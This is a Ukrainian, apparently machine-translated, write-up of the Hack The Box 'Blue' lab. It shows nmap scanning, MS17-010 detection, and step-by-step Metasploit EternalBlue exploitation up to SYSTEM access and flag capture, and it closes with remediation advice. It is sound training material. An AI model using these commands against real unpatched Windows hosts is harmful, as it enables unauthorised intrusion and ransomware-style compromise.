Зберігайте спокій і рубайте коробку - блакитний

Hack The Box (HTB) - це онлайн-платформа, яка дозволяє перевірити свої навички тестування на проникнення.

Він містить кілька завдань, які постійно оновлюються. Деякі з них імітують реальні світові сценарії, а деякі більше схиляються до стилю викликів CTF.

Примітка : Допускається лише виписка із старих машин HTB.

Синій - одна з найпростіших машин на Hack The Box. Але це демонструє вплив експлойту EternalBlue, який був використаний для компрометації компаній за допомогою масштабних атак вимагальних програм та криптовидобутку.

Ми застосуємо такі інструменти, щоб закласти вікно на ящику Kali Linux:

  • nmap
  • searchsploit
  • метасплойт
  • meterpreter

Давайте розпочнемо.

Спочатку я додаю синій у файл / etc / hosts.

nano /etc/hosts

з

10.10.10.40 blue.htb

Крок 1 - Розвідка

Першим кроком перед використанням машини є трішки сканування та розвідка.

Це одна з найважливіших частин, оскільки вона визначатиме, що можна спробувати використати згодом. Завжди краще витрачати більше часу на цей етап, щоб отримати якомога більше інформації.

Сканування портів

Я буду використовувати Nmap (Network Mapper). Nmap - це безкоштовна утиліта з відкритим кодом для виявлення мережі та аудиту безпеки.

Він використовує необроблені IP-пакети, щоб визначити, які хости доступні в мережі, які послуги пропонують ці хости, які операційні системи вони використовують, який тип фільтрів пакетів / брандмауери використовуються, і десятки інших характеристик.

Існує багато команд, які можна використовувати з цим інструментом для сканування мережі. Якщо ви хочете дізнатись більше про це, ви можете поглянути на документацію тут.

Я використовую таку команду для інтенсивного сканування:

nmap -A -v blue.htb

-A: Увімкнення виявлення ОС, виявлення версій, сканування сценарію та трасування

-v: Підвищує рівень деталізації

синій .htb: ім'я хосту для синього вікна

Якщо ви вважаєте, що результати занадто вражаючі, ви можете спробувати це:

nmap blue.htb

Ми бачимо, що є досить багато відкритих портів, включаючи:

Порт 445, спільний доступ до файлів SMB Microsoft-DS (служби каталогів)

Зі сканування nmap ми отримали деяку інформацію, що стосується імені комп'ютера (haris-PC) та версії SMB (2.02).

Серверний блок повідомлень (SMB) - це мережевий протокол, що дозволяє користувачам спілкуватися з віддаленими комп’ютерами та серверами, щоб використовувати їх ресурси, обмінюватися, відкривати та редагувати файли.

З назви цього вікна та того, що це машина з Windows із відкритим портом 445, ми можемо припустити, що машина вразлива до EternalBlue. Я використовую скрипт nmap, щоб перевірити цю інформацію наступним чином:

nmap --script vuln -p 445 blue.htb

Ми бачимо, що поле вразливе до вразливості віддаленого виконання коду на серверах Microsoft SMBv1 (ms17-010).

Крок 2 - Розуміння ms17-010

Що таке ms17-010?

EternalBlue - це кібератака, розроблена Агентством національної безпеки США (NSA). Він просочився хакерською групою Shadow Brokers 14 квітня 2017 року, через місяць після випуску виправлень для вразливості - Вікіпедія

Детальніше ви можете прочитати тут. Цю вразливість було виправлено та вказано в бюлетені безпеки Microsoft як MS17-010.

EternalBlue дозволяє хакерам віддалено виконувати довільний код, щоб отримати доступ до мережі. Він використовує вразливість у протоколі SMB ОС Windows. Експлойт може скомпрометувати всю мережу та підключені до неї пристрої.

Шкідливе програмне забезпечення, яке використовує EternalBlue, може поширюватися по мережах. У 2017 році WannaCry - крипто-програма-вимога - використовувала експлойт EternalBlue, який поширювався по мережі, заражаючи всі підключені пристрої.

Крок 3 - Використання EternalBlue

Я використовую Searchsploit, щоб перевірити, чи є якийсь відомий експлойт. Searchsploit - це інструмент пошуку в командному рядку для Exploit Database.

Я використовую таку команду:

searchsploit eternalblue

Я можу отримати більше подробиць про експлойт за допомогою:

searchsploit -x 41738.py

Ви також можете перевірити базу даних Exploit, щоб знайти експлойт.

Доступний один модуль Metasploit.

Ми будемо використовувати Metasploit , що є тестом на тестування на проникнення, який спрощує злом. Це важливий інструмент для багатьох нападників та захисників.

Я запускаю Metasploit Framework на Kali і шукаю команду, яку слід використовувати для експлоїту.

Не забудьте оновити Metasploit під час запуску за допомогою цієї команди:

msfupdate

Ви також можете перевірити, чи ціль уразлива до EternalBlue на Metasploit, використовуючи допоміжний засіб. Почніть з цієї команди:

search eternalblue

то в такому випадку

use 1

щоб вибрати

auxiliary/scanner/smb/smb_ms17_010

Ви можете перевірити параметри за допомогою

show options

і встановіть RHOSTS за допомогою

set RHOSTS blue.htb

Потім запустіть допоміжний с

run

Ви бачите, що хост, швидше за все, вразливий до MS17-010!

Давайте зараз перевіримо експлойт за допомогою

use 2

або команда

exploit/windows/smb/ms17_010_eternalblue

Нам потрібно встановити параметри для RHOSTS

та LHOST - мій був 10.10.14.24. Вам потрібно буде встановити його за допомогою власного LHOST. Ви можете перевірити свій тут.

Перед запуском експлоїту ви можете тут перевірити, чи машина вразлива - це запустить допоміжний, який ми використовували раніше за допомогою команди

check

Потім я запускаю експлойт з

run

Експлойт мусив запускатися кілька разів, перш ніж я отримав сеанс Meterpreter .

Ось визначення Meterpreter від Offensive Security:

Meterpreter - це вдосконалене, динамічно розширюване корисне навантаження, яке використовує вбудовані інженери DLL в пам’ять і розширюється по мережі під час виконання. Він зв’язується через сокет-стекер і забезпечує комплексний Ruby API на стороні клієнта. Він містить історію команд, завершення вкладки, канали тощо.

Детальніше про Meterpreter ви можете прочитати тут.

Почнемо зі збору деякої інформації.

getuid повертає реальний ідентифікатор користувача процесу виклику.

Обліковий запис NT Authority \ SYSTEM або LocalSystem - це вбудований обліковий запис Windows. Це найпотужніший обліковий запис у локальному екземплярі Windows. На цій машині ми маємо доступ адміністратора.

Крок 4 - Шукаємо прапор user.txt

Я переходжу до папки haris з Документи та налаштування .

Я можу перерахувати всі файли / папки за допомогою такої команди:

ls -la

Потім я переходжу на робочий стіл за допомогою

cd Desktop

І я знаходжу прапор користувача! Я можу перевірити вміст файлу за допомогою

cat user.txt

Крок 5 - Шукаємо прапор root.txt

Давайте зараз знайдемо кореневий прапор. Я переходжу до Користувачів і реєструюся в папці Адміністратор / Робочий стіл . Я знаходжу прапор!

Я використовую таку команду, щоб переглянути вміст файлу:

cat root.txt

Вітаємо! Ви знайшли обидва прапори.

Санації

  • Виправте свої пристрої з оновленням безпеки для Microsoft Windows SMB v1. Ви можете перевірити бюлетень безпеки Microsoft, щоб побачити, на які ОС це впливає
  • Вимкніть SMB v1 і використовуйте SMB v2 або v3
  • Застосовуйте принцип найменших привілеїв до всіх своїх систем та служб

Будь ласка, не соромтеся коментувати, ставити запитання чи ділитися з друзями :)

Більше статей із серії « Зберігай спокій і зламати скриньку» можна переглянути тут.

Ви можете стежити за мною в Twitter або на LinkedIn.

І не забудьте # GetSecure , # BeSecure & # StaySecure !